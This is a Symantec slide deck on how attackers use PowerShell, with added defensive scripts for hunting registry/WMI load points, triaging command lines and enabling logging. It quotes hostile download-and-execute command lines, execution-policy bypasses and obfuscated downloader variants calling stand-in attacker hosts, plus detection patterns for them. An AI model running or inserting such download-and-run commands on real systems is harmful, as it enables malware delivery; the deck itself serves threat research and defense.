The Rise of PowerShell Threats
Candid Wueest
PowerShell… in a nutshell
• PowerShell is a scripting language and command-line shell based on .NET
• Access to features such as Component Object Model (COM) & WMI
• Very powerful - features many cmdlets (command-lets)
• Installed by default on most Windows systems
• Default command shell from Windows 10 build 14971 onwards
• PowerShell scripts (.ps1) do not execute when double clicked
Copyright © 2017 Symantec Corporation
10 Reasons Why Attackers Love PowerShell
1. Installed by default on all new Windows computers
2. Can execute directly from memory (stealthy)
3. Generates few traces by default (forensic/stealthy)
4. Has remote access capabilities by default with encrypted traffic
5. As a script, it is easy to obfuscate & difficult to detect
6. Defenders often overlook it when hardening their systems
7. It can bypass application-whitelisting tools depending on the configuration
8. Many gateway sandboxes do not handle script-based malware well
9. It has a growing community with readily available scripts
10. Many system administrators use and trust the framework (hiding in plain sight)
Common Malware Use Cases for PowerShell
DOWNLOADER
PowerShell script used to download payload to disk or memory. Often used in email attachments such as WSF or document macros.
LOAD POINT
PowerShell script used as persistent load point on Windows. Often stored completely in registry (file-less), e.g. Kotver, or within WMI.
LATERAL MOVEMENT
PowerShell script remoting to execute on remote computer (Invoke-Command). Download and execute Mimikatz, etc. in order to steal credentials.
Example: Trojan.Poweliks
• File-less load point
• Multiple stages in registry
• Decrypted in memory
• Can be protected by a local encryption key, e.g. MAC address
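The load-point and Poweliks slides describe payloads that live only in the registry or in a WMI subscription. The following read-only hunt is an added example, not code from the Symantec deck: it walks the common Run keys and the root\subscription namespace and flags entries that look like PowerShell launchers or that carry an unusually long value (a possible embedded stage). The indicator regex, the 1000-character threshold and the key list are constructed starting points, not values from the deck.

```powershell
# Added example, not code from the Symantec deck: read-only hunt for file-less
# PowerShell load points (Run keys holding a launcher, or a WMI permanent event
# subscription). Indicator regex and thresholds are constructed; tune them.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Launcher shapes from the deck's argument table: the shell itself, encoded
# commands, hidden windows, and in-memory download-and-run idioms.
$launcherPattern = '(?i)powershell|-e(c|nc|ncodedcommand)?\b|-w(in|indowstyle)?\s+(hidden|1)\b|\biex\b|invoke-expression|frombase64string|downloadstring|downloadfile'

function Test-Launcher {
    param([string]$Text)
    return (-not [string]::IsNullOrWhiteSpace($Text)) -and ($Text -match $launcherPattern)
}

function New-Finding {
    param($Source, $Name, $Reason, $Data)
    $d = [string]$Data
    [pscustomobject]@{ Source = $Source; Name = $Name; Reason = $Reason
                       Data = $d.Substring(0, [Math]::Min(120, $d.Length)) }
}

function Get-RunKeyFindings {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $regKey = Get-Item -LiteralPath $key
        foreach ($name in $regKey.GetValueNames()) {
            $data = [string]$regKey.GetValue($name)
            $reasons = @()
            if (Test-Launcher $data)         { $reasons += 'PowerShell launcher pattern' }
            if ($data.Length -gt 1000)       { $reasons += "very long value ($($data.Length) chars): possible embedded stage" }
            if ($name -match '[^\x20-\x7E]') { $reasons += 'non-printable characters in value name' }
            if ($reasons.Count -gt 0) { New-Finding $key $name ($reasons -join '; ') $data }
        }
    }
}

function Get-WmiSubscriptionFindings {
    $cim = @{ Namespace = 'root\subscription'; ErrorAction = 'SilentlyContinue' }
    # Consumers hold the action (command line or script text) a subscription runs.
    foreach ($c in Get-CimInstance @cim -ClassName CommandLineEventConsumer) {
        if (Test-Launcher $c.CommandLineTemplate) { New-Finding 'WMI CommandLineEventConsumer' $c.Name 'PowerShell launcher pattern' $c.CommandLineTemplate }
    }
    foreach ($c in Get-CimInstance @cim -ClassName ActiveScriptEventConsumer) {
        if (Test-Launcher $c.ScriptText) { New-Finding 'WMI ActiveScriptEventConsumer' $c.Name 'PowerShell launcher pattern' $c.ScriptText }
    }
    # Every binding deserves a look: it is what makes a consumer fire on a filter.
    foreach ($b in Get-CimInstance @cim -ClassName __FilterToConsumerBinding) {
        New-Finding 'WMI __FilterToConsumerBinding' "$($b.Filter)" 'permanent subscription present; review filter and consumer' "$($b.Consumer)"
    }
}

$findings = @(Get-RunKeyFindings) + @(Get-WmiSubscriptionFindings)
if ($findings.Count -eq 0) { 'No PowerShell load-point indicators found.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

Run it from an elevated prompt so the HKLM keys and the root\subscription namespace are readable; the bindings are listed unconditionally because a legitimate permanent subscription is rare enough on a workstation that each one is worth a glance.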
PowerShell Execution Policy
Script execution is restricted by Windows, but can easily be overcome by the attacker. For example on the command line with:
-ExecutionPolicy bypass -command <a single command>
EXECUTION POLICY OPTIONS
• Restricted
• AllSigned
• RemoteSigned
• Unrestricted
• Bypass
POLICY SCOPE OPTIONS
• MachinePolicy
• UserPolicy
• Process
• CurrentUser
• LocalMachine
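The five scopes on this slide are resolved in a fixed precedence order, and the `-ExecutionPolicy bypass` argument only ever sets the Process scope. The report below is an added example (not from the deck) that shows which scope is actually in force on a host and whether it is backed by Group Policy; it assumes nothing beyond the built-in Get-ExecutionPolicy cmdlet.

```powershell
# Added example, not code from the Symantec deck: report which scope sets the
# execution policy PowerShell actually applies. Get-ExecutionPolicy -List returns
# scopes in precedence order (MachinePolicy, UserPolicy, Process, CurrentUser,
# LocalMachine); the first scope that is not Undefined wins.
function Get-ExecutionPolicyReport {
    $scopes    = Get-ExecutionPolicy -List
    $effective = Get-ExecutionPolicy
    $winner    = $scopes | Where-Object { $_.ExecutionPolicy -ne 'Undefined' } | Select-Object -First 1
    # Only the two Group Policy scopes outrank the Process scope that a
    # "-ExecutionPolicy bypass" argument sets for a single powershell.exe run.
    [pscustomobject]@{
        Effective         = $effective
        SetByScope        = if ($winner) { "$($winner.Scope)" } else { 'none (built-in default)' }
        GroupPolicyBacked = [bool]($winner -and ("$($winner.Scope)" -in @('MachinePolicy', 'UserPolicy')))
        ProcessOverride   = ($scopes | Where-Object Scope -eq 'Process').ExecutionPolicy -ne 'Undefined'
        AllScopes         = ($scopes | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join ', '
    }
}

Get-ExecutionPolicyReport
```

Run it once in a normal session and once in a session started with `-ExecutionPolicy bypass` to see the Process scope appear as the winner. The policy only governs loading of .ps1 files; `-Command` and `-EncodedCommand` never consult it, which is why the deck treats it as easily overcome and leans on logging and language restrictions on the later slides instead.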
Script Execution Arguments
Command line argument | Description | Occurrence in all samples | Argument shortcut distribution
-NoProfile | ignore the profile file | 33.77% | NoProfile (87%) / NoP (13%)
-WindowStyle Hidden | hide the command window | 23.76% | WindowStyle (64%) / Window (18%) / Wind (<1%) / Win (<1%) / w (18%)
-ExecutionPolicy Bypass | ignore the execution policy | 23.43% | ExecutionPolicy (84%) / Exec (2%) / ex (8%) / ep (5%)
-Command | run a single command | 22.45% | Command (100%)
-NoLogo | don't display the banner | 18.98% | NoLogo (89%) / NoL (11%)
-InputFormat | set the format for data input | 16.59% | InputFormat
-EncodedCommand | execute base64-encoded command | 6.58% | EncodedCommand (9%) / Enc (91%)
-NonInteractive | start in non-interactive mode | 3.82% | NonInteractive (7%) / nonI (93%)
-File | load script from file | 2.61% | File (100%)
Obfuscation
• As with any scripting language, obfuscation is easy
• 20+ different obfuscation tricks available, can be used iteratively
• Tools like «invoke-obfuscation» make it simple
Example script downloader:
(New-Object Net.WebClient).DownloadString("http://XXXX")
Object replacement with variables:
$webcl=New-Object Net.Webclient; $webcl.DownloadString($url)
Command substitution:
(&(GCM New-Ob*)net.webclient).downloadstring($url)
String manipulation:
(New-Object Net.WebClient).Downloadstring(("http://{2}{1}"-f 'no','.TLD','myAttackerSite'))
Obfuscation In The Wild
• Only 8% of the 111 observed PowerShell threats used obfuscation
• Targeted attack groups rarely bother with obfuscation
– Too much obfuscation can make the script appear more suspicious
• Extended script logging can reverse most of the obfuscation
Prevalence
• 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
TOP 3 THREATS THAT USE POWERSHELL
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader
[Chart: volume of PowerShell samples from customers in our sandbox in 2016]
PowerShell In Attacks
• PowerShell is gaining ground with attackers…
• And community support is rising fast
PEN TESTING FRAMEWORKS AVAILABLE
• PowerSploit
• PowerShell Empire
• NiShang
• PS>Attack
• Mimikatz
COMMON MALWARE TYPES OBSERVED
• Ransomware
• Downloader
• Back door
• ClickFraud
• Banking Trojan
We expect targeted attack groups to continue to favor simple PowerShell scripts as part of their attack tool chain in the future.
Targeted Attacks Using PowerShell
Most targeted attack groups use PowerShell scripts as part of a “living off the land” tactic
• Often used as downloader over HTTPS
• Information gathering (e.g. Mimikatz)
– Some still use system tools for data gathering, maybe to avoid behavior-based detection mechanisms
• Not yet seen any APT groups use a full PowerShell framework from end-to-end
– unlikely to happen
Example Usage By Targeted Attack Groups
Attack Group | Script Invocation
Pupa/DeepPanda | powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring([REMOVED]))"
Pupa/DeepPanda | powershell.exe -Win hidden -Enc [REMOVED]
Pupa/DeepPanda | powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED]
SeaDuke | powershell -executionpolicy bypass -File diag3.ps1
SeaDuke | powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] -Password [REMOVED] -Mailbox
CozyDuke | powershell.exe -WindowStyle hidden -encodedCommand [REMOVED]
Odinaff | powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED]
Buckeye | powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile("""http://[REMOVED]/images/rec.exe""","""$env:tmprec.exe""");Iex %tmp%rec.exe
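The argument table and the attack-group table together make one point for a defender: the same few switches recur, but under many abbreviations, with the payload either quoted, base64-encoded, or simply trailing after the last recognised switch. The triage function below is an added example, not code from the Symantec deck: it normalises the abbreviations to their full parameter names, decodes `-EncodedCommand`, treats a numeric `-w 1` as Hidden, and scores each command line on the traits both tables highlight. The sample command lines are constructed to mirror the deck's rows; `example.invalid` and the encoded string are placeholders, not indicators from the deck, and the prefix-matching rule is this example's model of powershell.exe, not a quotation of it.

```powershell
# Added example, not code from the Symantec deck: triage powershell.exe command
# lines of the shapes in the argument table and the attack-group table.
# Sample command lines are constructed; hosts and payloads are placeholders.

# powershell.exe accepts any prefix of a parameter name at least as long as the
# short form in Min (so -w, -win and -windowstyle all mean WindowStyle); ep, ec
# and if are explicit aliases. Order matters so that -ex wins over -e.
$switchTable = @(
    @{ Name = 'NoProfile';       Min = 'nop';  Aliases = @();     TakesValue = $false },
    @{ Name = 'NoLogo';          Min = 'nol';  Aliases = @();     TakesValue = $false },
    @{ Name = 'NonInteractive';  Min = 'noni'; Aliases = @();     TakesValue = $false },
    @{ Name = 'NoExit';          Min = 'noe';  Aliases = @();     TakesValue = $false },
    @{ Name = 'WindowStyle';     Min = 'w';    Aliases = @();     TakesValue = $true  },
    @{ Name = 'ExecutionPolicy'; Min = 'ex';   Aliases = @('ep'); TakesValue = $true  },
    @{ Name = 'EncodedCommand';  Min = 'e';    Aliases = @('ec'); TakesValue = $true  },
    @{ Name = 'InputFormat';     Min = 'i';    Aliases = @('if'); TakesValue = $true  },
    @{ Name = 'Command';         Min = 'c';    Aliases = @();     TakesValue = $true  },
    @{ Name = 'File';            Min = 'f';    Aliases = @();     TakesValue = $true  }
)
$windowStyleNumbers = @{ '0' = 'Normal'; '1' = 'Hidden'; '2' = 'Minimized'; '3' = 'Maximized' }

function Split-CommandLine {
    param([string]$Line)
    # Keep double-quoted runs together; everything else splits on whitespace.
    [regex]::Matches($Line, '"[^"]*"|\S+') | ForEach-Object { $_.Value }
}

function Resolve-Switch {
    param([string]$Token)
    $key = ($Token -replace '^[-/]', '').ToLowerInvariant()
    foreach ($s in $switchTable) {
        if ($key -in $s.Aliases) { return $s }
        if ($key.Length -ge $s.Min.Length -and $s.Name.ToLowerInvariant().StartsWith($key)) { return $s }
    }
    return $null
}

function ConvertFrom-EncodedCommand {
    param([string]$Base64)
    # -EncodedCommand is base64 over UTF-16LE text.
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64)) }
    catch { "<undecodable: $Base64>" }
}

function Get-InvocationTriage {
    param([string]$CommandLine)
    $t = @(Split-CommandLine $CommandLine)
    $r = [ordered]@{ Switches = @(); WindowStyle = $null; ExecutionPolicy = $null; Encoded = $false; File = $null; Command = $null }
    $i = 1                                      # $t[0] is the executable
    while ($i -lt $t.Count -and $t[$i] -match '^[-/]') {
        $sw = Resolve-Switch $t[$i]
        if (-not $sw) { break }                 # unknown token: implicit command starts here
        $r.Switches += $sw.Name
        $i++
        if (-not $sw.TakesValue) { continue }
        $value = if ($i -lt $t.Count) { $t[$i] } else { '' }
        $rest  = if ($i -lt $t.Count) { $t[$i..($t.Count - 1)] -join ' ' } else { '' }
        switch ($sw.Name) {
            'WindowStyle'     { $v = $value.ToLowerInvariant(); $r.WindowStyle = if ($windowStyleNumbers.ContainsKey($v)) { $windowStyleNumbers[$v] } else { $value }; $i++ }
            'ExecutionPolicy' { $r.ExecutionPolicy = $value; $i++ }
            'EncodedCommand'  { $r.Encoded = $true; $r.Command = ConvertFrom-EncodedCommand $value; $i++ }
            'Command'         { $r.Command = $rest -replace '^"(.*)"$', '$1'; $i = $t.Count }  # takes the rest of the line
            'File'            { $r.File = $value; $r.Command = $rest; $i = $t.Count }          # script plus its arguments
            default           { $i++ }
        }
    }
    if ($i -lt $t.Count -and -not $r.Command) {  # trailing text with no -Command switch
        $r.Command = $t[$i..($t.Count - 1)] -join ' '
        $r.Switches += 'Command(implicit)'
    }
    $reasons = @()
    if ($r.WindowStyle -eq 'Hidden')                               { $reasons += 'hidden window' }
    if ($r.Encoded)                                                { $reasons += 'encoded command' }
    if ($r.ExecutionPolicy -match '^(bypass|unrestricted)$')       { $reasons += "execution policy $($r.ExecutionPolicy)" }
    if ($r.Switches -contains 'NoProfile' -and $r.Switches -contains 'NonInteractive') { $reasons += 'automation flags (NoProfile+NonInteractive)' }
    if ($r.Command -match '(?i)downloadstring|downloadfile|net\.webclient|invoke-expression|\biex\b|frombase64string') { $reasons += 'download/execute pattern in command' }
    [pscustomobject]@{
        Score = $reasons.Count; Reasons = ($reasons -join '; '); WindowStyle = $r.WindowStyle
        ExecutionPolicy = $r.ExecutionPolicy; Encoded = $r.Encoded; File = $r.File
        Command = $r.Command; CommandLine = $CommandLine
    }
}

# Constructed samples modelled on the deck's tables (hosts and payloads are placeholders).
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("Write-Output 'constructed payload'"))
$samples = @(
    'powershell.exe -w hidden -nologo -noninteractive -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring(''http://example.invalid/a''))"',
    "powershell.exe -Win hidden -Enc $enc",
    'powershell -executionpolicy bypass -File diag3.ps1',
    'powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain CORP -User u -Password p -Mailbox',
    "powershell.exe -NoP -NonI -W Hidden -Enc $enc",
    'powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile("http://example.invalid/rec.exe","$env:tmp\rec.exe")',
    'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1'   # routine admin job, for contrast
)
$samples | ForEach-Object { Get-InvocationTriage $_ } | Sort-Object Score -Descending |
    Format-Table Score, WindowStyle, ExecutionPolicy, Encoded, Reasons, Command -AutoSize -Wrap
```

Feed it process-creation command lines (Sysmon event 1 or Security event 4688 with command-line auditing enabled) instead of the constructed list to use it on real data; the routine backup job at the end scores zero, which is the point of scoring on combinations rather than on the mere presence of powershell.exe.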
Things To Keep In Mind
• PowerShell scripts can be executed without powershell.exe, e.g. with a .NET binary
• Most attacks require the attacker to be able to execute code first
– PowerShell is not an exploit
– Common exploits and social engineering tricks still apply
• 55% of the malicious PowerShell scripts were executed from the command line
– Often from a dropped batch or VBS file
• PowerShell can be used for defense as well as offense
Mitigation
• Upgrade to PowerShell 5+ where possible (to enable logging)
• Enable extended logging/module logging and process/analyze the logs
• Check for PowerShell use on your systems (location, time, user, file name, etc.)
• Evaluate PowerShell constrained language mode/restricted runspace
• Evaluate system hardening, file whitelisting or AppLocker
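The first three mitigation items, and the earlier remark that extended script logging reverses most obfuscation, come down to turning on the PowerShell 5 logging channels and then actually reading them. The script below is an added example, not code from the Symantec deck: it writes the same registry values that the "Turn on PowerShell Script Block Logging", "Turn on Module Logging" and "Turn on PowerShell Transcription" Group Policy settings write, reports the current posture (including language mode), and pulls recent script-block events (ID 4104) whose de-obfuscated text matches download-and-run idioms. The transcript directory and the review regex are assumptions for this example.

```powershell
# Added example, not code from the Symantec deck: enable PowerShell 5+ logging as
# the Mitigation slide recommends, then review what was logged. HKLM writes need
# an elevated prompt. Transcript directory and review pattern are assumptions.

$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed; use a write-only share in production
    # Script block logging: event 4104 carries the code as it ran, after any
    # string building or -f formatting, which is what undoes most obfuscation.
    Set-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockLogging' 1
    # Module logging: event 4103 records pipeline execution per cmdlet; '*' = all modules.
    Set-PolicyValue "$base\ModuleLogging" 'EnableModuleLogging' 1
    Set-PolicyValue "$base\ModuleLogging\ModuleNames" '*' '*' 'String'
    # Transcription: full session text to disk, with a header naming user, host and time.
    Set-PolicyValue "$base\Transcription" 'EnableTranscripting' 1
    Set-PolicyValue "$base\Transcription" 'EnableInvocationHeader' 1
    Set-PolicyValue "$base\Transcription" 'OutputDirectory' $TranscriptDir 'String'
}

function Get-PowerShellLoggingPosture {
    [pscustomobject]@{
        PSVersion          = $PSVersionTable.PSVersion.ToString()
        LanguageMode       = "$($ExecutionContext.SessionState.LanguageMode)"   # ConstrainedLanguage is the hardened state
        ScriptBlockLogging = (Get-ItemProperty "$base\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        ModuleLogging      = (Get-ItemProperty "$base\ModuleLogging" -ErrorAction SilentlyContinue).EnableModuleLogging -eq 1
        Transcription      = (Get-ItemProperty "$base\Transcription" -ErrorAction SilentlyContinue).EnableTranscripting -eq 1
    }
}

function Get-RecentScriptBlocks {
    param(
        [int]$Max = 200,
        [string]$Pattern = '(?i)downloadstring|downloadfile|net\.webclient|frombase64string|invoke-expression|\biex\b'
    )
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $Max -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 payload order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
            $p = $_.Properties
            $text = [string]$p[2].Value
            if ($text -match $Pattern) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    User    = $_.UserId
                    Path    = if ($p.Count -gt 4) { $p[4].Value } else { '' }   # empty for in-memory code
                    Snippet = $text.Substring(0, [Math]::Min(200, $text.Length))
                }
            }
        }
}

Get-PowerShellLoggingPosture
# Enable-PowerShellLogging          # uncomment on a test host, elevated, then start a new session
Get-RecentScriptBlocks | Format-Table -AutoSize -Wrap
```

The Path column is what answers the slide's "location, time, user, file name" question: an empty path on a 4104 event is exactly the in-memory execution the deck says leaves few other forensic traces, and the User and Time columns fill in the rest. Expect volume (the conclusion warns that logging generates a lot of data), so forward the channel to a collector rather than reading it per host.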
APPLY COMMON BEST PRACTICES FOR EMAIL AND ENDPOINT SECURITY
PREVENT: Block the incursion or infection, and prevent any damage from occurring
CONTAIN: Limit the spread of an attack in the event of an intrusion
RESPOND: Have an incident response process ready, learn from the attack, and improve defenses
Symantec: Robust Protection Against PowerShell Threats
Advanced Antivirus Engine
• Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory-scanning, and machine-learning engines. This allows the detection of directly in-memory executed scripts.
SONAR Behavior Engine
• SONAR is Symantec’s real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.
• SONAR can detect PowerShell script behaviors often used in post-infection lateral movement and block them.
Email Protection
• Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users.
• Symantec Messaging Gateway’s Disarm Technology can also protect computers from this threat by removing malicious content from attached documents before they even reach the user.
Blue Coat Malware Analysis sandbox
• Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.
System Hardening
• Symantec’s system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of PowerShell and any of its actions.
Conclusion
• PowerShell is very powerful and is here to stay
• PowerShell is popular for downloading & lateral movement
• Attackers currently do not use much obfuscation
• In-memory execution leaves only a few forensic traces
• Logging can generate a lot of data to process
• But if full logging is enabled, then activity is very difficult to hide
Further reading
• BLOG: PowerShell threats surge: 95.4 percent of analyzed scripts were malicious
• WHITEPAPER: The increased use of PowerShell in attacks
Thank you!
Symantec Corporation (NASDAQ: SYMC), the world’s leading cyber security company, helps businesses, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure.
Likewise, a global community of more than 50 million people and families rely on Symantec’s Norton suite of products for protection at home and across all of their devices. Symantec operates one of the world’s largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats. For additional information, please
visit www.symantec.com or connect with us on Facebook, Twitter, and LinkedIn.
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the United States and other countries. Other names may be trademarks of their respective owners.
Candid Wueest
Presenter’s email
Presenter’s phone

Contenu connexe

Tendances

IDS Snort/SnortSam
IDS Snort/SnortSamIDS Snort/SnortSam
IDS Snort/SnortSam
Tiki.vn
 

Tendances (20)

Security Strategy and Tactic with Cyber Threat Intelligence (CTI)
Security Strategy and Tactic with Cyber Threat Intelligence (CTI)Security Strategy and Tactic with Cyber Threat Intelligence (CTI)
Security Strategy and Tactic with Cyber Threat Intelligence (CTI)
 
Threat Hunting Workshop
Threat Hunting WorkshopThreat Hunting Workshop
Threat Hunting Workshop
 
Firewall DMZ Zone
Firewall DMZ ZoneFirewall DMZ Zone
Firewall DMZ Zone
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysis
 
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
 
IDS Snort/SnortSam
IDS Snort/SnortSamIDS Snort/SnortSam
IDS Snort/SnortSam
 
Đề tài: Nghiên cứu kỹ thuật tấn công mạng LAN và giải pháp, HAY
Đề tài: Nghiên cứu kỹ thuật tấn công mạng LAN và giải pháp, HAYĐề tài: Nghiên cứu kỹ thuật tấn công mạng LAN và giải pháp, HAY
Đề tài: Nghiên cứu kỹ thuật tấn công mạng LAN và giải pháp, HAY
 
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
200 đề tài luận văn thạc sĩ an ninh mạng. HAY200 đề tài luận văn thạc sĩ an ninh mạng. HAY
200 đề tài luận văn thạc sĩ an ninh mạng. HAY
 
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort idsKịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
 
Join the hunt: Threat hunting for proactive cyber defense.pptx
Join the hunt: Threat hunting for proactive cyber defense.pptxJoin the hunt: Threat hunting for proactive cyber defense.pptx
Join the hunt: Threat hunting for proactive cyber defense.pptx
 
Snort it-slideshares.blogspot.com
Snort it-slideshares.blogspot.comSnort it-slideshares.blogspot.com
Snort it-slideshares.blogspot.com
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
 
The journey to ICS - Extended
The journey to ICS - Extended The journey to ICS - Extended
The journey to ICS - Extended
 
Ids
Ids Ids
Ids
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
Luận án: Nghiên cứu ứng dụng hiện tượng hỗn loạn của hệ thống động cho mật mã...
Luận án: Nghiên cứu ứng dụng hiện tượng hỗn loạn của hệ thống động cho mật mã...Luận án: Nghiên cứu ứng dụng hiện tượng hỗn loạn của hệ thống động cho mật mã...
Luận án: Nghiên cứu ứng dụng hiện tượng hỗn loạn của hệ thống động cho mật mã...
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
Windows Event Analysis - Correlation for Investigation
Windows Event Analysis - Correlation for InvestigationWindows Event Analysis - Correlation for Investigation
Windows Event Analysis - Correlation for Investigation
 
giai-phap-luu-tru-v2
giai-phap-luu-tru-v2giai-phap-luu-tru-v2
giai-phap-luu-tru-v2
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
 

Similaire à PowerShell: The increased use of PowerShell in cyber attacks

Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
jemtallon
 
Microsoft Operating System Vulnerabilities
Microsoft Operating System VulnerabilitiesMicrosoft Operating System Vulnerabilities
Microsoft Operating System Vulnerabilities
Information Technology
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
qqlan
 

Similaire à PowerShell: The increased use of PowerShell in cyber attacks (20)

Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
rsa-usa-2019-keynote-paula-januszkiewicz
rsa-usa-2019-keynote-paula-januszkiewiczrsa-usa-2019-keynote-paula-januszkiewicz
rsa-usa-2019-keynote-paula-januszkiewicz
 
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Ethical hacking   chapter 8 - Windows Vulnerabilities - Eric VanderburgEthical hacking   chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
 
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth TakingTop 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
 
Microsoft Operating System Vulnerabilities
Microsoft Operating System VulnerabilitiesMicrosoft Operating System Vulnerabilities
Microsoft Operating System Vulnerabilities
 
Microsoft OS Vulnerabilities
Microsoft OS VulnerabilitiesMicrosoft OS Vulnerabilities
Microsoft OS Vulnerabilities
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Windows network
Windows networkWindows network
Windows network
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
Top 10 ways to make hackers excited: All about the shortcuts not worth takingTop 10 ways to make hackers excited: All about the shortcuts not worth taking
